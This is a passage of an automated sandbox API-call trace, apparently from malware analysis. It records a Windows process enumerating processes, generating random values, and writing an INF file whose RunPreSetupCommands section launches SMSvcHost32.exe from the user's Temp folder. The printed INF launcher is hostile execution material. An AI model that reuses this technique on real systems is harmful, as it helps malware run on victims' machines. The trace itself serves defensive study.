	[0144.841] CloseHandle (hObject=0x2dc) returned 1
	[0144.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.841] CloseHandle (hObject=0x2dc) returned 1
	[0144.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0144.842] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.842] CloseHandle (hObject=0x2dc) returned 1
	[0144.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0144.842] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.842] CloseHandle (hObject=0x2dc) returned 1
	[0144.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0144.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.843] CloseHandle (hObject=0x2dc) returned 1
	[0144.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0144.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.843] CloseHandle (hObject=0x2dc) returned 1
	[0144.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18

Thread:
	id = 103
	os_tid = 0x440

	[0088.107] Sleep (dwMilliseconds=0x1388) 
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.497] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.498] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] GetLastError () returned 0x57
	[0093.499] LoadLibraryA (lpLibFileName="advapi32") returned 0x74aa0000
	[0093.500] GetProcAddress (hModule=0x74aa0000, lpProcName="SystemFunction036") returned 0x74682a60
	[0093.500] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.500] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] GetLastError () returned 0x57
	[0093.501] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.501] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.502] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] GetLastError () returned 0x57
	[0093.503] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.503] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.504] GetLastError () returned 0x57
	[0093.505] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] GetLastError () returned 0x57
	[0093.505] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.506] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] SystemFunction036 (in: RandomBuffer=0x29afc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x29afc8c) returned 1
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] GetLastError () returned 0x57
	[0093.507] wsprintfW (in: param_1=0x6a2920, param_2="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = %s:2\r\n\r\n[%s]\r\n%s\r\n" | out: param_1="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = djvpimusnwfalsccgbjjkvhapauypazvznmg:2\r\n\r\n[djvpimusnwfalsccgbjjkvhapauypazvznmg]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 274
	[0093.507] lstrlenW (lpString="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = djvpimusnwfalsccgbjjkvhapauypazvznmg:2\r\n\r\n[djvpimusnwfalsccgbjjkvhapauypazvznmg]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 274
	[0093.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = djvpimusnwfalsccgbjjkvhapauypazvznmg:2\r\n\r\n[djvpimusnwfalsccgbjjkvhapauypazvznmg]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", cchWideChar=-1, lpMultiByteStr=0x6a2b60, cbMultiByte=550, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = djvpimusnwfalsccgbjjkvhapauypazvznmg:2\r\n\r\n[djvpimusnwfalsccgbjjkvhapauypazvznmg]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", lpUsedDefaultChar=0x0) returned 275
	[0093.508] StrDupW (lpSrch="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0093.508] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0093.508] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x657b88, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf") returned 0x35
	[0093.508] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c
	[0093.509] GetSystemTime (in: lpSystemTime=0x29afe54 | out: lpSystemTime=0x29afe54*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x1, wSecond=0x39, wMilliseconds=0x2ec)) 
	[0093.509] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afe98 | out: lpFileTime=0x29afe98) returned 1
	[0093.509] SystemTimeToFileTime (in: lpSystemTime=0x29afe54, lpFileTime=0x29afea0 | out: lpFileTime=0x29afea0) returned 1
